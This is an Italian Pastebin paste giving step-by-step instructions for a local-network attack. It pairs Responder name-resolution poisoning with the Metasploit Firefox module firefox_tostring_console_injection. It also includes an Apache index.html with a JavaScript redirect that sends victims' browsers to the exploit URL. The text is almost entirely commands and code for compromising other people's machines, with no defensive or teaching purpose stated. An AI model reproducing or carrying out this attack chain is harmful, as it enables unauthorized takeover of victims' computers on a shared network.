Advertisement
Guest User

W-U.Leopold

a guest
Apr 25th, 2019
95
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.67 KB | None | 0 0
  1. Disabilità il server HTTP nel file di configurazione di Responder.
  2.  
  3. In msfconsole usa exploit/multi/browser/firefox_tostring_console_injection e fai partire l'exploit.
  4. L'exploit genererà un URL (esempio: http://192.168.1.25:8080/zjZ5pR), copialo e crea un file index.html in /var/www/html/ con il seguente contenuto:
  5. <html>
  6. <body>
  7. <script>window.location.href = 'URL_COPIATO';</script>
  8. </body>
  9. </html>
  10. Avvia un server apache con il comando:
  11. service apache2 start
  12. Avvia Responder ed aspetta.
  13.  
  14. Quello che succederà sarà: Responder farà in modo che tu riceva una richiesta HTTP sul tuo index.html che a sua volta indirizzerà il browser vittima sull'URL con l'exploit.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement